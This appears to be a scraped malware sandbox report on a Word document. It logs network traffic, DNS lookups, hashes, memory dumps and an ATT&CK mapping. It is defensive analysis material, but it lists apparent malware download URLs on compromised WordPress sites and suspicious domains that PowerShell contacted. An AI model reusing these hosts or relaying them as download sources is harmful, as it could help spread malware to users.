GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

tls, http

WINWORD.EXE

2.6kB
37.4kB
30
31

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

tls, http

WINWORD.EXE

2.5kB
41.7kB
32
35

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

tls, http

WINWORD.EXE

8.9kB
322.1kB
147
236

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

tls, http

WINWORD.EXE

2.7kB
70.8kB
33
58

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

tls, http

WINWORD.EXE

2.4kB
37.1kB
30
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

tls, http

WINWORD.EXE

2.1kB
27.7kB
24
24

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

tls, http

WINWORD.EXE

42.0kB
1.2MB
711
845

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

tls, http

WINWORD.EXE

138.1kB
3.6MB
2199
2555

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

tls, http

WINWORD.EXE

24.9kB
753.7kB
418
548

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

tls, http

WINWORD.EXE

109.8kB
3.4MB
1806
2435

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

tls, http

WINWORD.EXE

61.3kB
1.9MB
1105
1335

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

tls, http

WINWORD.EXE

1.5kB
27.5kB
16
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

tls, http

WINWORD.EXE

1.5kB
25.8kB
16
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

tls, http

WINWORD.EXE

1.5kB
26.8kB
16
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

tls, http

WINWORD.EXE

1.5kB
28.3kB
16
26

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

tls, http

WINWORD.EXE

1.5kB
27.6kB
16
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

tls, http

WINWORD.EXE

2.0kB
28.4kB
18
26

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

tls, http

WINWORD.EXE

1.5kB
24.9kB
15
23

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

tls, http

WINWORD.EXE

1.5kB
27.1kB
16
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

tls, http

WINWORD.EXE

9.8kB
290.4kB
178
213

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

tls, http

WINWORD.EXE

9.9kB
311.9kB
173
229

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

tls, http

WINWORD.EXE

8.8kB
284.9kB
161
209

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

tls, http

WINWORD.EXE

54.5kB
2.7MB
1074
1939

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

tls, http

WINWORD.EXE

5.6kB
274.6kB
104
202

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

tls, http

WINWORD.EXE

19.7kB
573.4kB
301
416

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

tls, http

WINWORD.EXE

15.3kB
669.1kB
288
485

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

tls, http

WINWORD.EXE

24.1kB
1.1MB
486
799

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

tls, http

WINWORD.EXE

10.5kB
236.5kB
163
174

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

tls, http

WINWORD.EXE

78.2kB
1.9MB
1196
1399

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

tls, http

WINWORD.EXE

45.6kB
1.4MB
765
978

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

tls, http

WINWORD.EXE

108.1kB
2.6MB
1643
1878

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

tls, http

WINWORD.EXE

37.5kB
990.2kB
612
715

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

HTTP Response

200
171.244.51.31:443

https://viettellogistics.com.vn/wp-content/oS4/

tls, http

powershell.exe

830 B
5.9kB
9
8

HTTP Request

GET https://viettellogistics.com.vn/wp-content/oS4/

HTTP Response

308
185.189.51.191:80

http://cococat.se/wp-admin/2Oaf/

http

powershell.exe

304 B
468 B
5
3

HTTP Request

GET http://cococat.se/wp-admin/2Oaf/

HTTP Response

301
185.189.51.191:443

cococat.se

tls

powershell.exe

581 B
3.2kB
7
6
89.42.208.212:80

http://andresirjan.ir/wp-admin/JSH/

http

powershell.exe

1.1kB
48.3kB
22
37

HTTP Request

GET http://andresirjan.ir/wp-admin/JSH/

HTTP Response

404
185.239.210.245:443

sptrade.com.br

tls

powershell.exe

406 B
610 B
5
4
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
13
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

86.4kB
2.4MB
1701
1698

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14

8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

roaming.officeapps.live.com

dns

WINWORD.EXE

73 B
248 B
1
1

DNS Request

roaming.officeapps.live.com

DNS Response

52.109.76.243
8.8.8.8:53

240.143.123.92.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

240.143.123.92.in-addr.arpa
8.8.8.8:53

240.76.109.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

240.76.109.52.in-addr.arpa
8.8.8.8:53

243.76.109.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

243.76.109.52.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

dtyl.shop

dns

powershell.exe

55 B
112 B
1
1

DNS Request

dtyl.shop
8.8.8.8:53

73.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

73.31.126.40.in-addr.arpa
8.8.8.8:53

star-speed.vip

dns

powershell.exe

60 B
121 B
1
1

DNS Request

star-speed.vip
8.8.8.8:53

cshub123.cn

dns

powershell.exe

57 B
73 B
1
1

DNS Request

cshub123.cn

DNS Response

216.152.233.103
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

194.61.62.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

194.61.62.23.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

94.65.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

94.65.42.20.in-addr.arpa
8.8.8.8:53

183.142.211.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

183.142.211.20.in-addr.arpa
8.8.8.8:53

metadata.templates.cdn.office.net

dns

WINWORD.EXE

79 B
231 B
1
1

DNS Request

metadata.templates.cdn.office.net

DNS Response

23.62.61.162

23.62.61.184
8.8.8.8:53

binaries.templates.cdn.office.net

dns

WINWORD.EXE

79 B
202 B
1
1

DNS Request

binaries.templates.cdn.office.net

DNS Response

2.17.251.23

2.17.251.32
8.8.8.8:53

162.61.62.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

162.61.62.23.in-addr.arpa
8.8.8.8:53

23.251.17.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

23.251.17.2.in-addr.arpa
8.8.8.8:53

viettellogistics.com.vn

dns

powershell.exe

69 B
85 B
1
1

DNS Request

viettellogistics.com.vn

DNS Response

171.244.51.31
8.8.8.8:53

31.51.244.171.in-addr.arpa

dns

72 B
161 B
1
1

DNS Request

31.51.244.171.in-addr.arpa
8.8.8.8:53

cococat.se

dns

powershell.exe

56 B
72 B
1
1

DNS Request

cococat.se

DNS Response

185.189.51.191
8.8.8.8:53

191.51.189.185.in-addr.arpa

dns

73 B
102 B
1
1

DNS Request

191.51.189.185.in-addr.arpa
8.8.8.8:53

andresirjan.ir

dns

powershell.exe

60 B
76 B
1
1

DNS Request

andresirjan.ir

DNS Response

89.42.208.212
8.8.8.8:53

212.208.42.89.in-addr.arpa

dns

72 B
99 B
1
1

DNS Request

212.208.42.89.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

sptrade.com.br

dns

powershell.exe

60 B
76 B
1
1

DNS Request

sptrade.com.br

DNS Response

185.239.210.245
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

245.210.239.185.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

245.210.239.185.in-addr.arpa
8.8.8.8:53

91.90.14.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

91.90.14.23.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCD7A31.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c0zf43nw.p3w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3260-7-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-1-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-4-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-5-0x00007FF81B96D000-0x00007FF81B96E000-memory.dmp

Filesize
4KB

Download
memory/3260-6-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-9-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-8-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-0-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-10-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-12-0x00007FF7D9340000-0x00007FF7D9350000-memory.dmp

Filesize
64KB

Download
memory/3260-11-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-14-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-13-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-18-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-19-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-17-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-15-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-16-0x00007FF7D9340000-0x00007FF7D9350000-memory.dmp

Filesize
64KB

Download
memory/3260-572-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-32-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-75-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-599-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-595-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-3-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-92-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-2-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-561-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-565-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-31-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-598-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-597-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-596-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3988-576-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3988-573-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3988-77-0x000001DC51AB0000-0x000001DC51AD2000-memory.dmp

Filesize
136KB

Download
memory/3988-76-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response